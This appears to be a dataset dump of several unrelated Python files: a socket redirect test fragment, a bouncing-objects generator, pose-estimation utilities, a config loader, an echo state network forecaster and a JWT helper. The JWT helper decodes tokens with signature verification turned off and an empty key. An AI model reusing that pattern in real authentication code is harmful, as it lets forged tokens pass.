initListenerSocket()\n\tfile = conn.makefile('r')\n\tfor i in range(3):\n\t\tmessages = 'server %s:%s\\n' %(mypid,i)\n\t\tconn.send(messages.encode())\n\t\tdata = file.readline().rstrip()\n\t\tprint('server %s got [%s]\\n' %(mypid,data))\n\ndef client5():\n\tmypid = os.getpid()\n\tredirectBothAsClient()\n\tfor i in range(3):\n\t\tdata = input()#recv\n\t\tmessages = 'client %s got:[%s]\\n' %(mypid,data)\n\t\tprint(messages)#send\t\t\n\t\tsys.stdout.flush()\n\t\t\nif __name__ =='__main__':\t\n\t#server1()\n\tmultiprocessing.Process(target = server5).start()\n\tclient5()\n", "sub_path": "web/server-sockets/test-socket_stream_redirect.py", "file_name": "test-socket_stream_redirect.py", "file_ext": "py", "file_size_in_byte": 2377, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.getpid", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.getpid", "line_number": 23, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.getpid", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 66, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.getpid", "line_number": 73, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 89, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "428800049", "text": "import argparse\nimport random\nimport sys\n\nimport numpy as np\n\nfrom bouncing_objects_generator.frame import Frame\nfrom bouncing_objects_generator.square import Square\n\n\nclass Cli:\n\n @classmethod\n def run(cls, frame_width: int, frame_height: int,\n object_width: int, object_height: int, objects_size: int,\n frames_per_window: int, window_size: int, npy_output: str):\n\n frame = Frame(width=frame_width, height=frame_height)\n for _ in range(objects_size):\n frame.register_object(\n Square(width=object_width, height=object_height,\n frame_width=frame.width, frame_height=frame.height,\n degree=random.choice(range(0, 360)),\n speed=random.choice(range(1, 20)))\n )\n\n all_windows = []\n window_shape = (frames_per_window, 1, frame_height, frame_width)\n for i in range(window_size):\n sys.stderr.write(f'{i + 1}/{window_size}\\r')\n sys.stderr.flush()\n\n window = None\n for _ in range(frames_per_window):\n image = np.asarray(frame.draw(), dtype=np.uint8).reshape(1, frame_height, frame_width)\n if window is None:\n window = image\n else:\n window = np.vstack((window, image))\n\n all_windows.append(window.reshape(window_shape[0], window_shape[1], window_shape[2], window_shape[3]))\n sys.stderr.write('\\n')\n np.save(npy_output, np.concatenate(all_windows, axis=1))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--frame_width', type=int, default=128)\n parser.add_argument('--frame_height', type=int, default=128)\n parser.add_argument('--object_width', type=int, default=32)\n parser.add_argument('--object_height', type=int, default=32)\n parser.add_argument('--frames_per_window', type=int, default=20)\n parser.add_argument('--window_size', type=int, default=100)\n parser.add_argument('--objects_size', type=int, default=3)\n parser.add_argument('--npy_output', type=str, default='bouncing_objects.npy')\n args = parser.parse_args()\n Cli.run(**vars(args))\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "bouncing_objects_generator/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 2248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "bouncing_objects_generator.frame.Frame", "line_number": 18, "usage_type": "call"}, {"api_name": "bouncing_objects_generator.square.Square", "line_number": 21, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 23, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "390248803", "text": "import torch\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom torch import nn\n\n\ndef compute_OKS(gt, dt, bb, area):\n\n sigmas = np.array([.26, .25, .25, .35, .35, .79, .79, .72, .72, .62,.62, 1.07, 1.07, .87, .87, .89, .89])/10.0\n vars = (sigmas * 2)**2\n k = len(sigmas)\n g = np.array(gt)\n xg = g[0::3]; yg = g[1::3]; vg = g[2::3]\n k1 = np.count_nonzero(vg > 0)\n x0 = bb[0] - bb[2]; x1 = bb[0] + bb[2] * 2\n y0 = bb[1] - bb[3]; y1 = bb[1] + bb[3] * 2\n d = np.array(dt)\n xd = d[0::3]; yd = d[1::3]\n if k1>0:\n # measure the per-keypoint distance if keypoints visible\n dx = xd - xg\n dy = yd - yg\n else:\n # measure minimum distance to keypoints in (x0,y0) & (x1,y1)\n z = np.zeros((k))\n dx = np.max((z, x0-xd),axis=0)+np.max((z, xd-x1),axis=0)\n dy = np.max((z, y0-yd),axis=0)+np.max((z, yd-y1),axis=0)\n e = (dx**2 + dy**2) / vars / (area.item()+np.spacing(1)) / 2\n if k1 > 0:\n e=e[vg > 0]\n OKS = np.sum(np.exp(-e)) / e.shape[0]\n\n return OKS\n\n\ndef plot_masks_on_image(im, masks):\n\n n_masks = masks.shape[0]\n #im = torch.transpose(im, 1, 2)\n #im = torch.transpose(im, 0, 1)\n for j in range(n_masks):\n\n r = cv2.resize(masks[j].numpy(), (256, 256))\n im[0, :, :] = im[0, :, :] + torch.from_numpy(r)\n\n return im\n\ndef get_transform(param, crop_pos, output_size, scales):\n shift_to_upper_left = np.identity(3)\n shift_to_center = np.identity(3)\n\n a = scales[0] * param['scale'] * np.cos(param['rot'])\n b = scales[1] * param['scale'] * np.sin(param['rot'])\n\n t = np.identity(3)\n t[0][0] = a\n if param['flip']:\n t[0][0] = -a\n\n t[0][1] = -b\n t[1][0] = b\n t[1][1] = a\n\n shift_to_upper_left[0][2] = -crop_pos[0] + param['tx']\n shift_to_upper_left[1][2] = -crop_pos[1] + param['ty']\n shift_to_center[0][2] = output_size / 2\n shift_to_center[1][2] = output_size / 2\n t_form = np.matmul(t, shift_to_upper_left)\n t_form = np.matmul(shift_to_center, t_form)\n\n return t_form\n\n\ndef apply_augmentation_test(example, output_size=256):\n im = cv2.imread(example, 1)\n height, width = im.shape[:2]\n\n crop_pos = [width / 2, height / 2]\n max_d = max(height, width)\n scales = [output_size / float(max_d), output_size / float(max_d)]\n\n param = {'rot': 0,\n 'scale': 1,\n 'flip': 0,\n 'tx': 0,\n 'ty': 0}\n\n t_form = get_transform(param, crop_pos, output_size, scales)\n im_cv = cv2.warpAffine(im, t_form[0:2, :], (output_size, output_size))\n img = cv2.cvtColor(im_cv, cv2.COLOR_BGR2RGB)\n imf = cv2.flip(img, 1)\n\n img = torch.from_numpy(img).float()\n img = torch.transpose(img, 1, 2)\n img = torch.transpose(img, 0, 1)\n img /= 255\n\n imf = torch.from_numpy(imf).float()\n imf = torch.transpose(imf, 1, 2)\n imf = torch.transpose(imf, 0, 1)\n imf /= 255\n\n warp = torch.from_numpy(np.linalg.inv(t_form))\n\n return img, imf, warp\n\n\ndef get_preds(prs, scales, warp):\n\n pool = nn.MaxPool2d(3, 1, 1).cuda()\n o = pool(prs.cuda()).data.cpu()\n maxm = torch.eq(o, prs).float()\n prs = prs * maxm\n res = 64\n prso = prs.view(res * res)\n val_k, ind = prso.topk(30, dim=0)\n xs = ind % res\n ys = (ind / res).long()\n xst, yst, sc, scores = [], [], [], []\n N = len(val_k)\n for i in range(N):\n if val_k[i] >= 0.001:\n xst.append(xs[i].item() * 4)\n yst.append(ys[i].item() * 4)\n sc.append(np.exp(scales[0][ys[i]][xs[i]]) * warp[0][0])\n scores.append(val_k[i])\n points = np.ones((3, len(sc)))\n points[0, :], points[1, :] = xst, yst\n dets = np.matmul(warp, points)\n\n return dets, sc, scores\n\n\ndef apply_augmentation_test_td(path, example, output_size=256):\n\n im = cv2.imread(path, 1)\n crop_pos = example['center']\n #crop_pos = [example['bbox'][0] + example['bbox'][2]/2, example['bbox'][1] + example['bbox'][3]/2]\n #x1, x2 = example['unit']['GT_bbox'][0], example['unit']['GT_bbox'][2]\n #y1, y2 = example['unit']['GT_bbox'][1], example['unit']['GT_bbox'][3]\n #crop_pos = [(x1+x2)/2, (y1+y2)/2]\n #max_d = np.maximum(abs(x1-x2), abs(y1-y2))\n max_d = example['scale']\n #max_d = np.maximum(example['bbox'][2], example['bbox'][3])\n scales = [output_size / float(max_d), output_size / float(max_d)]\n\n param = {'rot': 0,\n 'scale': 1,\n 'flip': 0,\n 'tx': 0,\n 'ty': 0}\n\n t_form = get_transform(param, crop_pos, output_size, scales)\n im_cv = cv2.warpAffine(im, t_form[0:2, :], (output_size, output_size))\n img = cv2.cvtColor(im_cv, cv2.COLOR_BGR2RGB)\n imf = cv2.flip(img, 1)\n\n img = torch.from_numpy(img).float()\n img = torch.transpose(img, 1, 2)\n img = torch.transpose(img, 0, 1)\n img /= 255\n\n imf = torch.from_numpy(imf).float()\n imf = torch.transpose(imf, 1, 2)\n imf = torch.transpose(imf, 0, 1)\n imf /= 255\n\n warp = torch.from_numpy(np.linalg.inv(t_form))\n\n return img, imf, warp\n\n\ndef get_preds_td(prs, mat, sr):\n\n pool = nn.MaxPool2d(3, 1, 1).cuda()\n\n xoff = sr[0:17]\n yoff = sr[17:34]\n\n prs2 = prs\n\n o = pool(prs.cuda()).data.cpu()\n maxm = torch.eq(o, prs).float()\n prs = prs * maxm\n res = 64\n prso = prs.view(17, res * res)\n val_k, ind = prso.topk(1, dim=1)\n xs = ind % res\n ys = (ind / res).long()\n\n\n keypoints = []\n score = 0\n points = torch.zeros(17, 2)\n c = 0\n\n for j in range(17):\n\n x, y = xs[j][0], ys[j][0]\n dx = xoff[j][int(y)][int(x)]\n dy = yoff[j][int(y)][int(x)]\n points[j][0] = (x * 4) + dx.item()\n points[j][1] = (y * 4) + dy.item()\n\n score += val_k[j][0]\n c += 1\n\n score /= c\n\n for j in range(17):\n\n point = torch.ones(3, 1)\n #if points[j][0] > 0 and points[j][1] > 0:\n point[0][0] = points[j][0]\n point[1][0] = points[j][1]\n #else:\n # point[0][0] = xm\n # point[1][0] = ym\n\n keypoint = np.matmul(mat, point)\n keypoints.append(float(keypoint[0].item()))\n keypoints.append(float(keypoint[1].item()))\n #keypoints.append(int(point[0][0]))\n #keypoints.append(int(point[1][0]))\n keypoints.append(1)\n\n return keypoints, score.item()\n\n", "sub_path": "data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 6322, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.spacing", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.eq", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.eq", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "360347704", "text": "\"\"\"Handling settings configured within CliEN/config.json\n\"\"\"\nimport sys\n\nif __name__ == \"__main__\":\n sys.exit()\n\nimport os\nimport json\n\n\n# i define this here instead of constants to avoid a circular dependency issue.\n_CLIEN_HOME = os.path.dirname(os.path.abspath(__file__))\n_CONFIG = os.path.join(_CLIEN_HOME, \"config.json\")\n\nconfig = None\n\n\ndef load_config():\n \"\"\"Sanity checks the user settings.\n \"\"\"\n global config\n\n _config = json.load(open(_CONFIG, \"rb\"))\n\n if os.path.isdir(_config[\"PY4J_JAR_DIR_PATH\"]) is False:\n raise Exception(\"\\n\\t\\tERROR: PY4J_DIR_PATH directory is invalid\\n\")\n if os.path.isfile(_config[\"WORD2VEC_BIN_PATH\"]) is False:\n raise Exception(\"\\n\\t\\tERROR: WORD2VEC_BIN_PATH is not a file\\n\")\n if os.path.isfile(_config[\"WORD_FREQ\"]) is False:\n raise Exception(\"\\n\\t\\tERROR: WORD_FREQ is not a faile\\n\")\n\n config = _config\n\nload_config()\n", "sub_path": "clien/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "sys.exit", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "229169481", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sparse\nfrom numpy.linalg import eigvals\n\nwork_root = os.environ['WORK']\n\n\n# ESN code\ndef generate_reservoir(size, radius, degree, random_state):\n sparsity = degree / float(size)\n\n A = sparse.rand(size, size, density=sparsity, random_state=random_state).todense()\n vals = eigvals(A)\n e = np.max(np.abs(vals))\n\n # A = sparse.rand(size, size, density=sparsity, random_state=random_state)\n # vals = eigs(A, k=1, which='LM', return_eigenvectors=False)\n # e = np.abs(vals[0])\n # A = A.todense()\n\n A = (A / e) * radius\n return A\n\n\ndef reservoir_layer(A, Win, input, n):\n states = np.zeros((n, input.shape[1]))\n for i in range(input.shape[1] - 1):\n states[:, i + 1] = np.tanh(np.dot(A, states[:, i]) + np.dot(Win, input[:, i]))\n return states\n\n\ndef train(beta, states, data, n, lsp):\n idenmat = beta * sparse.identity(n)\n states2 = states.copy()\n for j in range(2, np.shape(states2)[0] - 2):\n if np.mod(j, 2) == 0:\n states2[j, :] = states[j - 1, :] * states[j - 2, :]\n U = np.dot(states2, states2.transpose()) + idenmat\n Uinv = np.linalg.inv(U)\n Wout = np.dot(Uinv, np.dot(states2, data[lsp:data.shape[0] - lsp, :].transpose()))\n return Wout.transpose()\n\n\nclass ESN:\n def __init__(self, radius=0.1, degree=3, sigma=0.5, approx_res_size=5000, beta=0.0001, random_state=360, lsp=0):\n self._radius = radius\n self._degree = degree\n self._sigma = sigma\n self._approx_res_size = approx_res_size\n self._beta = beta\n self._random_state = random_state\n self._lsp = lsp\n\n self._fn = None\n self._n = None\n self._A = None\n self._Win = None\n self._Wout = None\n\n self.x = None\n\n def fit(self, data):\n self._fn = data.shape[0]\n self._n = int(np.floor(self._approx_res_size / self._fn) * self._fn)\n self._A = generate_reservoir(self._n, self._radius, self._degree, self._random_state)\n\n q = int(self._n / self._fn)\n self._Win = np.zeros((self._n, self._fn))\n for i in range(self._fn): # init input layer\n np.random.seed(seed=i)\n self._Win[i * q: (i + 1) * q, i] = self._sigma * (-1 + 2 * np.random.rand(1, q)[0])\n\n states = reservoir_layer(self._A, self._Win, data, self._n)\n self._Wout = train(self._beta, states, data, self._n, self._lsp)\n self.x = states[:, -1]\n return self\n\n def predict(self, predict_length):\n\n output = np.zeros((self._fn, predict_length))\n out = self.predict_next()\n output[:, 0] = out\n for i in range(1, predict_length):\n out = self.predict_next(out)\n output[:, i] = out\n return output\n\n def predict_next(self, u=None):\n if u is not None:\n x1 = np.tanh(np.dot(self._A, self.x) + np.dot(self._Win, u))\n self.x = np.squeeze(np.asarray(x1))\n x_aug = self.x.copy()\n for j in range(2, np.shape(x_aug)[0] - 2):\n if np.mod(j, 2) == 0:\n x_aug[j] = self.x[j - 1] * self.x[j - 2]\n out = np.squeeze(np.asarray(np.dot(self._Wout, x_aug)), axis=0)\n return out\n\n\ndef split_modulo(start, stop, array_len):\n if stop <= start:\n stop += array_len\n return np.arange(start, stop) % array_len\n\n\ndef load_data(train_length):\n pd_data = pd.read_csv(work_root + '/data/3tier_lorenz_v3.csv', header=None).T\n print(pd_data.shape)\n return np.array(pd_data)[:, :train_length]\n\n\ndef main():\n Q = 8\n g = 8\n q = int(Q / g)\n lsp = 3\n predict_length = 10000\n train_length = 500000\n approx_res_size = 5000\n\n data = load_data(train_length)\n\n splits = list(map(lambda i: data[split_modulo(i * q - lsp, (i + 1) * q + lsp, Q), :], range(g)))\n\n fitted_models = list(map(lambda x: ESN(lsp=lsp, approx_res_size=approx_res_size).fit(x), splits))\n\n output_parts = list(map(lambda model: model.predict_next(), fitted_models))\n\n output = np.zeros((Q, predict_length))\n output[:, 0] = np.concatenate(output_parts)\n\n input_parts = np.empty(g, dtype=object)\n for j in range(predict_length):\n output_parts = list(map(lambda model, input_part: model.predict_next(input_part), fitted_models, input_parts))\n output[:, j] = np.concatenate(output_parts)\n input_parts = list(map(lambda i: output[split_modulo(i * q - lsp, (i + 1) * q + lsp, Q), j], range(g)))\n\n print(output.shape)\n np.savetxt(work_root + '/data/Sequential_Expansion_2step_back_' + str(g) + '.txt', output)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/ESN_Sequential.py", "file_name": "ESN_Sequential.py", "file_ext": "py", "file_size_in_byte": 4687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scipy.sparse.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.linalg.eigvals", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.sparse.identity", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 76, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 145, "usage_type": "call"}]}
+{"seq_id": "562072272", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport jwt\nimport redis\n\nfrom pythinkutils.common.log import g_logger\nfrom pythinkutils.config.Config import g_config\nfrom pythinkutils.common.object2json import *\nfrom pythinkutils.redis.ThinkRedis import ThinkRedis\n\nclass TokenUtils:\n\n g_szHost = g_config.get(\"auth\", \"host\")\n JWT_SALT = \"\"\n\n @classmethod\n def auth_token(cls, szAppId, szSecret):\n try:\n szUrl = \"{}{}\".format(TokenUtils.g_szHost, \"/ruoyi-api/auth/token\")\n resp = requests.post(szUrl, data={\"appid\": szAppId, \"secret\": szSecret})\n\n if 200 != resp.status_code:\n return None\n\n dictRet = json.loads(resp.text)\n if 200 != dictRet[\"code\"]:\n return None\n\n return dictRet[\"token\"]\n except Exception as ex:\n g_logger.error(ex)\n return None\n\n @classmethod\n def get_info(cls, szToken):\n try:\n szUrl = \"{}{}\".format(TokenUtils.g_szHost, \"/ruoyi-api/getInfo\")\n dictHeader = {\n \"Authorization\": \"Bearer {}\".format(szToken)\n }\n\n resp = requests.get(szUrl, headers = dictHeader)\n if 200 != resp.status_code:\n return None\n\n dictRet = json.loads(resp.text)\n if 200 != dictRet[\"code\"]:\n return None\n\n return dictRet\n except Exception as ex:\n g_logger.error(ex)\n return None\n\n @classmethod\n def parse_token(cls, szToken):\n try:\n jwt_options = {\n 'verify_signature': False,\n 'verify_exp': True,\n 'verify_nbf': False,\n 'verify_iat': True,\n 'verify_aud': False\n }\n\n dictToken = jwt.decode(szToken, TokenUtils.JWT_SALT, algorithms=[\"HS512\"], options=jwt_options)\n return dictToken\n except Exception as ex:\n g_logger.error(ex)\n return None\n\n @classmethod\n def expire_time(cls, szToken):\n try:\n dictToken = cls.parse_token(szToken)\n if dictToken is None:\n return 0\n\n r = redis.StrictRedis(connection_pool=ThinkRedis.get_conn_pool_ex())\n\n szKey = \"login_tokens:{}\".format(dictToken[\"login_user_key\"])\n return r.ttl(szKey)\n\n except Exception as ex:\n g_logger.error(ex)\n return 0\n\n\n# szToken = TokenUtils.auth_token(\"1234\", \"5678\")\n# g_logger.info(szToken)\n#\n# dictRet = TokenUtils.get_info(szToken)\n# g_logger.info(obj2json(dictRet))\n#\n# g_logger.info(obj2json(TokenUtils.parse_token(szToken)))\n# g_logger.info(TokenUtils.expire_time(szToken))\n\n", "sub_path": "pythinkutils/jwt/TokenUtils.py", "file_name": "TokenUtils.py", "file_ext": "py", "file_size_in_byte": 2731, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pythinkutils.config.Config.g_config.get", "line_number": 15, "usage_type": "call"}, {"api_name": "pythinkutils.config.Config.g_config", "line_number": 15, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 33, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 33, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 54, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 54, "usage_type": "name"}, {"api_name": "jwt.decode", "line_number": 68, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 71, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 71, "usage_type": "name"}, {"api_name": "redis.StrictRedis", "line_number": 81, "usage_type": "call"}, {"api_name": "pythinkutils.redis.ThinkRedis.ThinkRedis.get_conn_pool_ex", "line_number": 81, "usage_type": "call"}, {"api_name": "pythinkutils.redis.ThinkRedis.ThinkRedis", "line_number": 81, "usage_type": "name"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 87, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 87, "usage_type": "name"}]}
